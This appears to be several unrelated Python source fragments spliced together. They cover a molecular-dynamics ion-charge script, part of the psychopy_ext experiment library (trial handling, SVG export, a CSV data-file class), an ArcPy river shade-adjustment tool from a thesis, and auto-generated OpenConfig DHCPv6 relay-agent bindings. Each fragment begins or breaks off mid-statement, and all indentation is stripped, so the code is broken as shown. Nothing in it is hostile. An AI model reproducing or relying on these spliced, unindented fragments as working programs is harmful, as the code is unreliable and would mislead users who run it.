q[t] += (zmin - previous)*charges[id[i]]
q *= (e / (zmax - zmin))
return q
if __name__ == '__main__':
start = time.time()
args = initialize()
# Constants
kb = 1.38 * 10 ** -23 # Boltzmann constant [=] J/K
e = 1.602 * 10 ** -19 # elementary charge (C)
q = Atom_props.charge[args.ion] * e # elementary charge (1.602e-19 C) * charge of ion
frontfrac = args.frontfrac
fracshow = args.fracshow
d = len(args.axis) # number of dimensions in which msd is being computed
ndx = []
if 'x' in args.axis:
ndx.append(0)
if 'y' in args.axis:
ndx.append(1)
if 'z' in args.axis:
ndx.append(2)
t = md.load(args.traj, top=args.gro)[args.begin:]
keep = [a.index for a in t.topology.atoms if a.name == | |
self.all_keys += [(self.this_trial['autoresp'], self.this_trial['autort'])]
self.post_trial()
# correct timing if autorun
if self.rp['autorun'] > 0:
try:
self.this_trial['autort'] *= self.rp['autorun']
self.this_trial['rt'] *= self.rp['autorun']
except: # maybe not all keys are present
pass
self.this_trial['onset'] *= self.rp['autorun']
self.this_trial['dur'] *= self.rp['autorun']
self.datafile.write_header(self.info.keys() + self.this_trial.keys())
self.datafile.write(self.info.values() + self.this_trial.values())
self.cumtime += self.this_trial['dur']
# update exp_plan with new values
try:
self.exp_plan[self.trialmap[self.thisIndex]] = self.this_trial
except: # for staircase
self.exp_plan.append(self.this_trial)
def after_trial(self):
"""Alias to :func:`~psychopy_ext.exp.Task.post_trial()`
"""
self.post_trial()
def post_trial(self):
"""A default function what to do after a trial is over.
It records the participant's response as the last key pressed,
calculates accuracy based on the expected (correct) response value,
and records the time of the last key press with respect to the onset
of a trial. If no key was pressed, participant's response and response
time are recorded as an empty string, while accuracy is assigned a
'No response'.
:Args:
- this_trial (dict)
A dictionary of trial properties
- all_keys (list of tuples)
A list of tuples with the name of the pressed key and the time
of the key press.
:Returns:
this_trial with ``subj_resp``, ``accuracy``, and ``rt`` filled in.
"""
if len(self.all_keys) > 0:
this_resp = self.all_keys.pop()
if hasattr(self, 'respmap'):
subj_resp = this_resp[2]
else:
subj_resp = self.computer.valid_responses[this_resp[0]]
self.this_trial['subj_resp'] = subj_resp
try:
acc = signal_det(self.this_trial['corr_resp'], subj_resp)
except:
pass
else:
self.this_trial['accuracy'] = acc
self.this_trial['rt'] = this_resp[1]
else:
self.this_trial['subj_resp'] = ''
try:
acc = signal_det(self.this_trial['corr_resp'], self.this_trial['subj_resp'])
except:
pass
else:
self.this_trial['accuracy'] = acc
self.this_trial['rt'] = ''
def run_event(self):
"""Presents a trial and catches key presses.
"""
# go over each event in a trial
self.event_clock.reset()
self.mouse.clickReset()
# show stimuli
event_keys = self.this_event.func()
if isinstance(event_keys, tuple):
event_keys = [event_keys]
elif event_keys is None:
event_keys = []
if len(event_keys) > 0:
self.all_keys += event_keys
# this is to get keys if we did not do that during trial
self.all_keys += self.last_keypress(
keyList=self.computer.valid_responses.keys(),
timeStamped=self.trial_clock)
#if self.this_event.rectime:
#if len(self.win.frameIntervals) > 0:
#self.rectimes.append(self.win.frameIntervals[-1])
#self.win.frameIntervals = []
def get_behav_df(self, pattern='%s'):
"""
Extracts data from files for data analysis.
:Kwargs:
pattern (str, default: '%s')
A string with formatter information. Usually it contains a path
to where data is and a formatter such as '%s' to indicate where
participant ID should be incorporated.
:Returns:
A `pandas.DataFrame` of data for the requested participants.
"""
return get_behav_df(self.info['subjid'], pattern=pattern)
class SVG(object):
def __init__(self, win, filename='image'):
if no_svg:
raise ImportError("Module 'svgwrite' not found.")
#visual.helpers.setColor(win, win.color)
win.contrast = 1
self.win = win
self.aspect = self.win.size[0]/float(self.win.size[1])
self.open(filename)
def open(self, filename):
filename = filename.split('.svg')[0]
self.svgfile = svgwrite.Drawing(profile='tiny',filename='%s.svg' % filename,
size=('%dpx' % self.win.size[0],
'%dpx' % self.win.size[1]),
# set default units to px; from http://stackoverflow.com/a/13008664
viewBox=('%d %d %d %d' %
(0,0,
self.win.size[0],
self.win.size[1]))
)
bkgr = self.svgfile.rect(insert=(0,0), size=('100%','100%'),
fill=self.color2rgb255(self.win))
self.svgfile.add(bkgr)
def save(self):
self.svgfile.save()
def color2attr(self, stim, attr, color='black', colorSpace=None, kwargs=None):
if kwargs is None: kwargs = {}
col = self.color2rgb255(stim, color=color, colorSpace=colorSpace)
if col is None:
kwargs[attr + '_opacity'] = 0
else:
kwargs[attr] = col
kwargs[attr + '_opacity'] = 1
return kwargs
def write(self, stim):
if 'Circle' in str(stim):
color_kw = self.color2attr(stim, 'stroke', color=stim.lineColor,
colorSpace=stim.lineColorSpace)
color_kw = self.color2attr(stim, 'fill', color=stim.fillColor,
colorSpace=stim.fillColorSpace,
kwargs=color_kw)
svgstim = self.svgfile.circle(
center=self.get_pos(stim),
r=self.get_size(stim, stim.radius),
stroke_width=stim.lineWidth,
opacity=stim.opacity,
**color_kw
)
elif 'ImageStim' in str(stim):
raise NotImplemented
elif 'Line' in str(stim):
color_kw = self.color2attr(stim, 'stroke', color=stim.lineColor,
colorSpace=stim.lineColorSpace)
svgstim = self.svgfile.line(
start=self.get_pos(stim, stim.start),
end=self.get_pos(stim, stim.end),
stroke_width=stim.lineWidth,
opacity=stim.opacity,
**color_kw
)
elif 'Polygon' in str(stim):
raise NotImplemented
#svgstim = self.svgfile.polygon(
#points=...,
#stroke_width=stim.lineWidth,
#stroke=self.color2rgb255(stim, color=stim.lineColor,
#colorSpace=stim.lineColorSpace),
#fill=self.color2rgb255(stim, color=stim.fillColor,
#colorSpace=stim.fillColorSpace)
#)
elif 'Rect' in str(stim):
color_kw = self.color2attr(stim, 'stroke', color=stim.lineColor,
colorSpace=stim.lineColorSpace)
color_kw = self.color2attr(stim, 'fill', color=stim.fillColor,
colorSpace=stim.fillColorSpace,
kwargs=color_kw)
svgstim = self.svgfile.rect(
insert=self.get_pos(stim, offset=(-stim.width/2., -stim.height/2.)),
size=(self.get_size(stim, stim.width), self.get_size(stim, stim.height)),
stroke_width=stim.lineWidth,
opacity=stim.opacity,
**color_kw
)
elif 'ThickShapeStim' in str(stim):
svgstim = stim.to_svg(self)
elif 'ShapeStim' in str(stim):
points = self._calc_attr(stim, np.array(stim.vertices))
points[:, 1] *= -1
color_kw = self.color2attr(stim, 'stroke', color=stim.lineColor,
colorSpace=stim.lineColorSpace)
color_kw = self.color2attr(stim, 'fill', color=stim.fillColor,
colorSpace=stim.fillColorSpace,
kwargs=color_kw)
if stim.closeShape:
svgstim = self.svgfile.polygon(
points=points,
stroke_width=stim.lineWidth,
opacity=stim.opacity,
**color_kw
)
else:
svgstim = self.svgfile.polyline(
points=points,
stroke_width=stim.lineWidth,
opacity=stim.opacity,
**color_kw
)
tr = self.get_pos(stim)
svgstim.translate(tr[0], tr[1])
elif 'SimpleImageStim' in str(stim):
raise NotImplemented
elif 'TextStim' in str(stim):
if stim.font == '':
font = 'arial'
else:
font = stim.font
svgstim = self.svgfile.text(text=stim.text,
insert=self.get_pos(stim) + np.array([0,stim.height/2.]),
fill=self.color2rgb255(stim),
font_family=font,
font_size=self._calc_attr(stim, stim.height),
text_anchor='middle',
opacity=stim.opacity
)
else:
svgstim = stim.to_svg(self)
if not isinstance(svgstim, list):
svgstim = [svgstim]
for st in svgstim:
self.svgfile.add(st)
def get_pos(self, stim, pos=None, offset=None):
if pos is None:
pos = stim.pos
if offset is not None:
offset = self._calc_attr(stim, np.array(offset))
else:
offset = np.array([0,0])
pos = self._calc_attr(stim, pos)
pos = self.win.size/2 + np.array([pos[0], -pos[1]]) + offset
return pos
def get_size(self, stim, size=None):
if size is None:
size = stim.size
size = self._calc_attr(stim, size)
return size
def _calc_attr(self, stim, attr):
if stim.units == 'height':
try:
len(attr) == 2
except:
out = (attr * stim.win.size[1])
else:
out = (attr * stim.win.size * np.array([1./self.aspect, 1]))
elif stim.units == 'norm':
try:
len(attr) == 2
except:
out = (attr * stim.win.size[1]/2)
else:
out = (attr * stim.win.size/2)
elif stim.units == 'pix':
out = attr
elif stim.units == 'cm':
out = misc.cm2pix(attr, stim.win.monitor)
elif stim.units in ['deg', 'degs']:
out = misc.deg2pix(attr, stim.win.monitor)
else:
raise NotImplementedError
return out
def color2rgb255(self, stim, color=None, colorSpace=None):
"""
Convert color to RGB255 while adding contrast
#Requires self.color, self.colorSpace and self.contrast
Modified from psychopy.visual.BaseVisualStim._getDesiredRGB
"""
if color is None:
color = stim.color
if isinstance(color, str) and stim.contrast == 1:
color = color.lower() # keep the nice name
else:
# Ensure that we work on 0-centered color (to make negative contrast values work)
if colorSpace is None:
colorSpace = stim.colorSpace
if colorSpace not in ['rgb', 'dkl', 'lms', 'hsv']:
color = (color / 255.0) * 2 - 1
# Convert to RGB in range 0:1 and scaled for contrast
# although the shader then has to convert it back it gets clamped en route otherwise
try:
color = (color * stim.contrast + 1) / 2.0 * 255
color = 'rgb(%d,%d,%d)' % (color[0],color[1],color[2])
except:
color = None
return color
class Datafile(object):
def __init__(self, filename, writeable=True, header=None):
"""
A convenience class for managing data files.
Output is recorded in a comma-separeated (csv) file.
.. note:: In the output file, floats are formatted to 1 ms precision so
that output files are nice.
:Args:
filename (str)
Path to the file name
:Kwargs:
- writeable (bool, defualt: True)
Can data be written in file or not. Might seem a bit silly
but it is actually very useful because you can create
a file and tell it to write data without thinking
whether `no_output` is set.
- header (list, default: None)
If you give a header, then it will already be written
in the datafile. Usually it's better to wait and write
it only when the first data line is available.
"""
self.filename = filename
self.writeable = writeable
self._header_written = False
if header is not None:
self.write_header(header)
else:
self.header = header
def open(self):
"""Opens a csv file for writing data
"""
if self.writeable:
try_makedirs(os.path.dirname(self.filename))
try:
self.dfile = open(self.filename, 'ab')
self.datawriter = csv.writer(self.dfile, lineterminator = '\n')
except IOError:
raise IOError('Cannot write to the data file %s!' % self.filename)
def close(self):
"""Closes the file
"""
if self.writeable:
self.dfile.close()
def write(self, data):
"""
Writes data list to a file.
.. note:: In the output file, floats are formatted to 1 ms precision so
that output files are nice.
:Args:
data (list)
A list of values to write in a datafile
"""
if self.writeable:
# cut down floats to 1 ms precision
dataf = ['%.3f'%i if isinstance(i,float) else i for i in data]
self.datawriter.writerow(dataf)
def write_header(self, header):
"""Determines if a header should be writen in a csv data file.
Works by reading the first line and comparing it to the given header.
If the header already is present, then a new one is not written.
:Args:
header (list of str)
A list of column names
"""
self.header = header
if self.writeable and not self._header_written:
write_head = False
# no header needed if the file already exists and has one
try:
| |
<gh_stars>0
#******************************************************************************************************
# Name: River shade adjustment tool - part 1
# Created: 1/25/2021
# Updated: 2/26/2021
# Author: <NAME>
#
# Summary: This is the current-conditions shade adjustment tool referenced in the MS thesis
# "Lidar-based riparian forest assessment of the Nooksack River, Washington" by
# <NAME>, Western Washington University, Bellingham, Washington.
# For details on how to use this script, see the thesis report available at:
# https://cedar.wwu.edu
#
# Description: For the inundated area of the river, this script determines which direction the shade
# is coming from, calculates the mean leaf area index for the bank casting the shadows,
# and then estimates the proportion of sunlight that would reach the water surface
# based on the modeled transmissivity of the vegetation.
#
# The output is a series of partially overlapping tif rasters in the GoodOutputs folder
# and shapefiles in the ErrorOutputs folder. The files in the GoodOutputs folder should
# be merged together into a single raster, with the "mean" option for the overlapping
# areas. The ErrorOutputs file contains the sub-reaches that the script was unable to
# process for some reason (usually related to complex geometry, which is a problem in
# braided channel areas). I would reccomend merging the GoodOutputs first, then filling in
# any significant holes by hand (i.e. look at the leaf area index of the bank casting the
# deepest shadows, use the equation given in this script to calculate the transmissivity
# of the canopy, and assign this value to the missing data area). Do this in the GUI.
#
# If you just want to add nodata values to all the Error areas, you can do this easily by
# adding a new field to the inundated area polygon ("RiverArea") with the nodata value,
# converting the inundated area polygon to raster, and then using the Mosaic to New Raster
# tool to combine it with the other rasters. Use the Mosaic Operator parameter to specify
# that the error values should only be copied if the is nothing in the canopy
# transmissivity layer (with the good values).
#
# Once you are satisfied with the coverage of the canopy transmissivity layer, save it as
# "canopy_transmissivity" in the GDB (snap the cells to the "DTM_minus_DSM" layer)and run
# Part 2 (which corrects the shade values).
#
# Limitations and appropriate use: This script is intended to be used on watershed-scale
# analyses where a more detailed manual approach would be cost-prohibitive. If you are
# only working with one or two reaches, it is probably better to assign transmissivity
# modifiers by hand. This script is most likely to mis-calculate transmissivity or give
# error values for sub-reaches with a north/south orientation and on sub-reaches that are
# very curved (U-shaped) relative to their width (usually these are short side channels).
#
# ArcPy error management: Occasionally this script throws the ArcPy Error 99999: "Table
# already exists, Spatial reference not found" error. I believe this is related to a
# problem with the automatic overwrite of partial files stored in the AppData temp folder.
# If this happens, rename the output of the line throwing the error (for example,
# in line 123, you would change >>DSM_clipped = "DSM_clipped_to_river"<< to
# >>DSM_clipped = "DSM_clipped_to_river1"<<). This will not affect any meaningful
# outputs of the script.
#
# This script runs in Python 3.6 and requires an Esri Advanced license level.
#*****************************************************************************************************
### Settings: ###
# import modules for the error catcher
import sys, string, os,traceback, datetime
# import module for arcpy
import arcpy
from arcpy.sa import *
from arcpy import env
# Enable overwrite
arcpy.env.overwriteOutput = True
# Parallel processing: Use 50% of the cores on the machine
arcpy.env.parallelProcessingFactor = "50%"
# Current time stamp
RightNow = datetime.datetime.now()
# Set the workspace environment to local file geodatabase
# This contains the input files and will also contain intermediate outputs (which can be useful
# for troubleshooting).
env.workspace = r"C:\ShadeModelCorrector\ShadeModelHome.gdb"
#*****************************************************************************************************
RightNow = datetime.datetime.now()
try:
#*********************************************************************************************
### Setup: ###
print("SETUP:")
# Set the location of the two folders that will contain the output
GoodOutputs = r"C:\ShadeModelCorrector\GoodOutputs"
ErrorOutputs = r"C:\ShadeModelCorrector\ErrorOutputs"
# Read in files:
# DSM shade model (raster), representing total solar energy per square meter, calculated from
# a canopy surface model raster representing terrain + vegetation.
# (Shade models were created with the Area Solar Radiation (Spatial Analyst) tool)
DSM = "Daily_AreaSol_DSM_Demo"
print("DSM set")
# DTM shade model (raster)
# (Calculated from a digital terrain raster, no vegetation).
DTM = "Daily_AreaSol_DTM_Demo"
print("DTM set")
# River area polygon, representing total inundated area (polygon)
inundated_area = "RiverArea_Demo"
print("river area set")
# River area centerlines (line)
# (River area centerlines can be generated using the Polygon to Centerline (Topographic
# Production Tools) tool on the river area polygon).
# NOTE: this layer must have a "ScriptID" field with unique IDs
river_center = "RiverArea_Centerline_Demo"
print("river centerlines set")
#Leaf area index raster, calculated from lidar using methods from Richardson, Moskal, and Kim (2009)
#This raster's native resolution is 30-meters, but it has been resampled to 1-meter to facilitate processing
# in this script
LAI = "effectiveLAI_Demo"
print("leaf area index set")
# Read in the shade aspect raster (calculated by running the "Aspect" tool on the DSM raster
shade_aspect = "Aspect_ofShade_Demo"
#**********************************************************************************************
### Preliminary steps: ###
print("")
print("PRELIMINARY STEPS:")
# Create raster representing proportion of light that can reach the ground through the vegetation
# (Calculated based on leaf area index and Beer's Law; see Richardson, Moskal, and Kim (2009)
# intensity below / intensity above = e^(-k*L); k = extinction coefficient, L = leaf area index
minusK = -0.47687
# proportion of light that penetrates canopy = e^(-0.47687)*LAI
# So...
outTimes = Times(LAI, minusK)
actual_proportion = Exp(outTimes)
actual_proportion.save("actual_proportion")
actual_proportion = "actual_proportion"
print("Beer's law light proportion raster created")
# Clip the DTM and DSM to the inundated area
DSM_clipped = "DSM_clipped_to_river1"
DSM_clipped = arcpy.Clip_management(DSM, "", DSM_clipped, inundated_area, "-9999", "ClippingGeometry",
"NO_MAINTAIN_EXTENT")
print("DSM clipped")
DTM_clipped = "DTM_clipped_to_river"
DTM_clipped = arcpy.Clip_management(DTM, "", DTM_clipped, inundated_area, "-9999", "ClippingGeometry",
"NO_MAINTAIN_EXTENT")
print("DTM clipped")
# Subtract the clipped DSM from the DTM to get the amount by which solar energy would be
# reduced if the vegetation was 100% occulsive
veg_diff_raw = Minus(DTM_clipped, DSM_clipped)
print("raw difference of DTM and DSM computed...")
# Use the Con tool to clean up the veg_difference layer, changing all values below 0
# to 0 (cleaning up noise from run-to-run variability)
veg_diff = Con(veg_diff_raw >= 0, veg_diff_raw, 0)
print("Vegetation raster complete.")
# Determine the angle of the shade gradient (to determine where the shadow is coming from)
shade_aspect = Int(shade_aspect)
print("Aspect values converted to integer")
# Convert the river area polygon to a polyline feature (necessary for later processing)
river_area_lines = "RiverArea_PolygonToLine"
arcpy.FeatureToLine_management(inundated_area, river_area_lines)
print("River area polycon converted to lines")
# Use the Linear Directional Mean tool to determine the mean direction of the centerline segments
foo = "centerline_direction"
linearDirectMean = arcpy.DirectionalMean_stats(river_center, foo, "DIRECTION", Case_Field="ScriptID")
linearDirectMean = foo
print("Finished calculating mean direction of stream segments.")
#**********************************************************************************************
### Pair each stream segment with the appropriate leaf area index modifier: ###
print("")
print("PAIRING BANK CONDITIONS TO SHADE AREAS:")
print("(Expect this section to take approximately 45-60 seconds per stream segment...)")
# For each line segment in centerline_segments... (n = 2994), output = selected_centerline
cursor = arcpy.da.SearchCursor(river_center,'ScriptID')
for row in cursor:
puppy = row[0]
print("")
# select the segment
expression = ('"ScriptID" = {}'.format(puppy))
river_center_select = arcpy.SelectLayerByAttribute_management(river_center, 'NEW_SELECTION', expression)
myoutput = "subsetx"
arcpy.CopyFeatures_management(river_center_select, myoutput)
selected_centerline = myoutput
print("Processing segment {}".format(puppy))
# Get the mean direction for that line segment, output = line_azimuth
foo = ('"ScriptID" = {}'.format(puppy))
direction_select = arcpy.SelectLayerByAttribute_management(linearDirectMean, 'NEW_SELECTION', foo)
cursor = arcpy.da.SearchCursor(direction_select,'CompassA')
for row in cursor:
line_azimuth = row[0]
print("line azimuth = {}".format(line_azimuth))
# Clip the river polygon to the line segment, output = subreach_x
# Buffer selected_centerline with a BIG buffer and non-rounded edges
foo_output = "foobuffer"
foobuffer = arcpy.Buffer_analysis(selected_centerline, foo_output, "35 meters", "FULL", "FLAT")
# Clip inundated_area with the buffer
foo_clip_output = "fooclip"
fooclip = arcpy.Clip_analysis(inundated_area, foo_output, foo_clip_output)
# Convert multi-part to single-part
| |
an
interface
"""
__slots__ = ('_path_helper', '_extmethods', '__enable_interface_id','__enable_remote_id','__interface_id','__remote_id','__sent_interface_id','__sent_remote_id',)
_yang_name = 'state'
_yang_namespace = 'http://openconfig.net/yang/relay-agent'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__enable_interface_id = YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enable-interface-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='boolean', is_config=False)
self.__enable_remote_id = YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enable-remote-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='boolean', is_config=False)
self.__interface_id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="interface-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)
self.__remote_id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="remote-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)
self.__sent_interface_id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="sent-interface-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)
self.__sent_remote_id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="sent-remote-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return ['relay-agent', 'dhcpv6', 'interfaces', 'interface', 'options', 'state']
def _get_enable_interface_id(self):
"""
Getter method for enable_interface_id, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/options/state/enable_interface_id (boolean)
YANG Description: Enables DHCPv6 OPTION_INTERFACE_ID (18) to identify the
interface on which the client message was received.
"""
return self.__enable_interface_id
def _set_enable_interface_id(self, v, load=False):
"""
Setter method for enable_interface_id, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/options/state/enable_interface_id (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_enable_interface_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_enable_interface_id() directly.
YANG Description: Enables DHCPv6 OPTION_INTERFACE_ID (18) to identify the
interface on which the client message was received.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enable-interface-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """enable_interface_id must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enable-interface-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='boolean', is_config=False)""",
})
self.__enable_interface_id = t
if hasattr(self, '_set'):
self._set()
def _unset_enable_interface_id(self):
self.__enable_interface_id = YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enable-interface-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='boolean', is_config=False)
def _get_enable_remote_id(self):
"""
Getter method for enable_remote_id, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/options/state/enable_remote_id (boolean)
YANG Description: Sets DHCPv6 OPTION_REMOTE_ID (37). This option is the
DHCPv6 equivalent for the IPv4 (DHCPv4) Relay Agent Option's
Remote-ID suboption as specified in RFC 3046. The remote-id
field may be used to encode a user name, remote IP address,
interface/port identifier, etc.
"""
return self.__enable_remote_id
def _set_enable_remote_id(self, v, load=False):
"""
Setter method for enable_remote_id, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/options/state/enable_remote_id (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_enable_remote_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_enable_remote_id() directly.
YANG Description: Sets DHCPv6 OPTION_REMOTE_ID (37). This option is the
DHCPv6 equivalent for the IPv4 (DHCPv4) Relay Agent Option's
Remote-ID suboption as specified in RFC 3046. The remote-id
field may be used to encode a user name, remote IP address,
interface/port identifier, etc.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enable-remote-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """enable_remote_id must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enable-remote-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='boolean', is_config=False)""",
})
self.__enable_remote_id = t
if hasattr(self, '_set'):
self._set()
def _unset_enable_remote_id(self):
self.__enable_remote_id = YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enable-remote-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='boolean', is_config=False)
def _get_interface_id(self):
"""
Getter method for interface_id, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/options/state/interface_id (string)
YANG Description: Sets DHCPv6 OPTION_INTERFACE_ID (18) to identify the
interface on which the client message was received.
"""
return self.__interface_id
def _set_interface_id(self, v, load=False):
"""
Setter method for interface_id, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/options/state/interface_id (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_interface_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_interface_id() directly.
YANG Description: Sets DHCPv6 OPTION_INTERFACE_ID (18) to identify the
interface on which the client message was received.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="interface-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """interface_id must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="interface-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)""",
})
self.__interface_id = t
if hasattr(self, '_set'):
self._set()
def _unset_interface_id(self):
self.__interface_id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="interface-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)
def _get_remote_id(self):
"""
Getter method for remote_id, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/options/state/remote_id (string)
YANG Description: Sets DHCPv6 OPTION_REMOTE_ID (37). This option is the
DHCPv6 equivalent for the IPv4 (DHCPv4) Relay Agent Option's
Remote-ID suboption as specified in RFC 3046. The remote-id
field may be used to encode a user name, remote IP address,
interface/port identifier, etc.
"""
return self.__remote_id
def _set_remote_id(self, v, load=False):
"""
Setter method for remote_id, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/options/state/remote_id (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_remote_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_remote_id() directly.
YANG Description: Sets DHCPv6 OPTION_REMOTE_ID (37). This option is the
DHCPv6 equivalent for the IPv4 (DHCPv4) Relay Agent Option's
Remote-ID suboption as specified in RFC 3046. The remote-id
field may be used to encode a user name, remote IP address,
interface/port identifier, etc.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="remote-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """remote_id must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="remote-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)""",
})
self.__remote_id = t
if hasattr(self, '_set'):
self._set()
def _unset_remote_id(self):
self.__remote_id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="remote-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)
def _get_sent_interface_id(self):
"""
Getter method for sent_interface_id, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/options/state/sent_interface_id (string)
YANG Description: Reflects the DHCPv6 OPTION_INTERFACE_ID (18) sent to the
server by the system.
"""
return self.__sent_interface_id
def _set_sent_interface_id(self, v, load=False):
"""
Setter method for sent_interface_id, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/options/state/sent_interface_id (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_sent_interface_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_sent_interface_id() directly.
YANG Description: Reflects the DHCPv6 OPTION_INTERFACE_ID (18) sent to the
server by the system.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="sent-interface-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """sent_interface_id must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="sent-interface-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)""",
})
self.__sent_interface_id = t
if hasattr(self, '_set'):
self._set()
def _unset_sent_interface_id(self):
